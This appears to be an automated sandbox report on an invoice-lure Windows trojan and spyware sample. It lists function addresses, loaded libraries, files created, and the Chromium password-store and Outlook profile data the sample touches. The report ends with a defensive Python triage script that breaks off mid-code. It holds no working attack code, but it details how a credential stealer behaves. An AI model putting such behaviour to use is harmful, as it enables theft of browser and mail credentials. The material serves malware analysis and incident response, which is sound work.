          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E1A70 | 12_2_380E1A70
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E1A80 | 12_2_380E1A80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E7680 | 12_2_380E7680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3692 | 12_2_380E3692
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5690 | 12_2_380E5690
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E36A0 | 12_2_380E36A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9AB7 | 12_2_380E9AB7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9AC8 | 12_2_380E9AC8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E7B00 | 12_2_380E7B00
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EFB01 | 12_2_380EFB01
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3B1F | 12_2_380E3B1F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EE317 | 12_2_380EE317
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E7B10 | 12_2_380E7B10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5B10 | 12_2_380E5B10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EE328 | 12_2_380EE328
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5B20 | 12_2_380E5B20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3B30 | 12_2_380E3B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9F49 | 12_2_380E9F49
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9F58 | 12_2_380E9F58
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E7F8F | 12_2_380E7F8F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E7FA0 | 12_2_380E7FA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5FA0 | 12_2_380E5FA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5FB0 | 12_2_380E5FB0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3FB0 | 12_2_380E3FB0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3FC0 | 12_2_380E3FC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EE7DF | 12_2_380EE7DF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EA3D8 | 12_2_380EA3D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EA3E8 | 12_2_380EA3E8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EBBE0 | 12_2_380EBBE0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EBBF0 | 12_2_380EBBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EE7F0 | 12_2_380EE7F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F1850 | 12_2_380F1850
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FF8D8 | 12_2_380FF8D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F8D88 | 12_2_380F8D88
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F4A88 | 12_2_380F4A88
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FF2A0 | 12_2_380FF2A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FC728 | 12_2_380FC728
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F23D0 | 12_2_380F23D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FCC10 | 12_2_380FCC10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F0023 | 12_2_380F0023
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FCC20 | 12_2_380FCC20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F1841 | 12_2_380F1841
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F0040 | 12_2_380F0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FD118 | 12_2_380FD118
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FD5EC | 12_2_380FD5EC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F85F0 | 12_2_380F85F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F8600 | 12_2_380F8600
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FD610 | 12_2_380FD610
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FDA59 | 12_2_380FDA59
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FDA68 | 12_2_380FDA68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F4A79 | 12_2_380F4A79
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F9678 | 12_2_380F9678
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FDEBF | 12_2_380FDEBF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FDEC0 | 12_2_380FDEC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F0B20 | 12_2_380F0B20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FE33F | 12_2_380FE33F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F0B30 | 12_2_380F0B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FE340 | 12_2_380FE340
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FE788 | 12_2_380FE788
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FE798 | 12_2_380FE798
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F8FA8 | 12_2_380F8FA8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380F23C0 | 12_2_380F23C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380FEBF0 | 12_2_380FEBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392BF268 | 12_2_392BF268
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B8AE8 | 12_2_392B8AE8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B2B38 | 12_2_392B2B38
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B4330 | 12_2_392B4330
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B0508 | 12_2_392B0508
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B7300 | 12_2_392B7300
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B5B18 | 12_2_392B5B18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B431F | 12_2_392B431F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B5B11 | 12_2_392B5B11
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_392B6960 | 12_2_392B6960
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B136012_2_392B1360
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B517912_2_392B5179
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B697012_2_392B6970
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B814812_2_392B8148
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B2B4812_2_392B2B48
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B815812_2_392B8158
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B39A012_2_392B39A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B21A712_2_392B21A7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B77B912_2_392B77B9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B21B812_2_392B21B8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BF58812_2_392BF588
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B518812_2_392B5188
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B398F12_2_392B398F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B47E812_2_392B47E8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5FE012_2_392B5FE0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B47F812_2_392B47F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B2FFF12_2_392B2FFF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B77C812_2_392B77C8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BFBC812_2_392BFBC8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B09C012_2_392B09C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5FD012_2_392B5FD0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B09D012_2_392B09D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B182812_2_392B1828
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B6E2812_2_392B6E28
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B862012_2_392B8620
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B6E3812_2_392B6E38
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B181912_2_392B1819
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B861012_2_392B8610
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B301012_2_392B3010
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B001712_2_392B0017
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B3E6812_2_392B3E68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BA66812_2_392BA668
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B266F12_2_392B266F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B7C7F12_2_392B7C7F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B564112_2_392B5641
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B004012_2_392B0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B3E5812_2_392B3E58
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B565012_2_392B5650
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B64A812_2_392B64A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BF8A812_2_392BF8A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B4CB212_2_392B4CB2
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B0E8912_2_392B0E89
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B268012_2_392B2680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B0E9812_2_392B0E98
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B7C9012_2_392B7C90
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B649712_2_392B6497
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B1CE112_2_392B1CE1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B04F812_2_392B04F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B72F112_2_392B72F1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B1CF012_2_392B1CF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B34CA12_2_392B34CA
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B4CC012_2_392B4CC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B8AD812_2_392B8AD8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B34D812_2_392B34D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C6DA012_2_392C6DA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CE46012_2_392CE460
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C6A8012_2_392C6A80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C2F2012_2_392C2F20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C612012_2_392C6120
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C932012_2_392C9320
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CC52012_2_392CC520
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C130012_2_392C1300
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C450012_2_392C4500
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C770012_2_392C7700
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CA90012_2_392CA900
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CDB0012_2_392CDB00
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C2F1212_2_392C2F12
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C036012_2_392C0360
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C356012_2_392C3560
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C676012_2_392C6760
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C996012_2_392C9960
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CCB6012_2_392CCB60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C837012_2_392C8370
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: String function: 00402A3A appears 50 times
          Source: FACTURAS_1_250075.exe, 00000000.00000002.1916047297.0000000000436000.00000002.00000001.01000000.00000003.sdmp    Binary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe, 0000000C.00000000.1913214803.0000000000436000.00000002.00000001.01000000.00000003.sdmp    Binary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2543957485.0000000035D97000.00000004.00000010.00020000.00000000.sdmp    Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe    Binary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe    Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine    Classification label: mal100.troj.spyw.evad.winEXE@3/25@5/5
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 12_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Code function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File created: C:\Users\user\Slutafregningers175
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Mutant created: NULL
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File created: C:\Users\user\AppData\Local\Temp\nsv26C7.tmp
          Source: FACTURAS_1_250075.exe    Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2236393385.0000000037115000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: FACTURAS_1_250075.exe    Virustotal: Detection: 70%
          Source: FACTURAS_1_250075.exe    ReversingLabs: Detection: 71%
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File read: C:\Users\user\Desktop\FACTURAS_1_250075.exe
          Source: unknown    Process created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Process created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: oleacc.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: version.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: version.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: rasapi32.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: rasman.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: rtutils.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    File written: C:\Users\user\Slutafregningers175\ammunitionsfabrikkers\Moussens\Enculturating.ini
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe    Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: FACTURAS_1_250075.exe    Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
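The CREATE TABLE password_notes string found in process memory above is the schema of Chromium's Login Data SQLite file (the browser password store), which is what the "Tries to harvest and steal browser information" signature rests on; the Outlook profile key is the mail-credential counterpart. The Python script below is an added example, not code from the Joe Sandbox report or from the sample, of the triage an incident responder runs against a copy of a Login Data file taken from the affected host: it lists which accounts were stored and which protection scheme each password blob carries, so you know what the stealer could have decrypted in-process. It assumes a reduced logins table with only the columns the query reads (Chromium's real table has more), a constructed in-memory database standing in for a real file, and the blob prefixes "v10" (AES-GCM with the key kept DPAPI-wrapped in Local State), "v20" (app-bound key) and the DPAPI blob header for legacy entries; those prefixes come from Chromium's own code, not from this report.

```python
"""Triage a copied Chromium 'Login Data' file: which accounts are stored and
how each password blob is protected.  Added example.  password_notes DDL is the
string seen in the sample's memory; the logins table is a reduced stand-in
(assumption) and all rows are constructed test data."""
import sqlite3
from typing import Dict, List, Optional

# Verbatim from the memory string in the report.
PASSWORD_NOTES_DDL = (
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE "
    "DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
    "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key))"
)

# Reduced stand-in for Chromium's logins table (assumption: only the columns the
# triage query touches; the real table carries many more).
LOGINS_DDL = (
    "CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "origin_url VARCHAR NOT NULL, username_value VARCHAR, password_value BLOB, "
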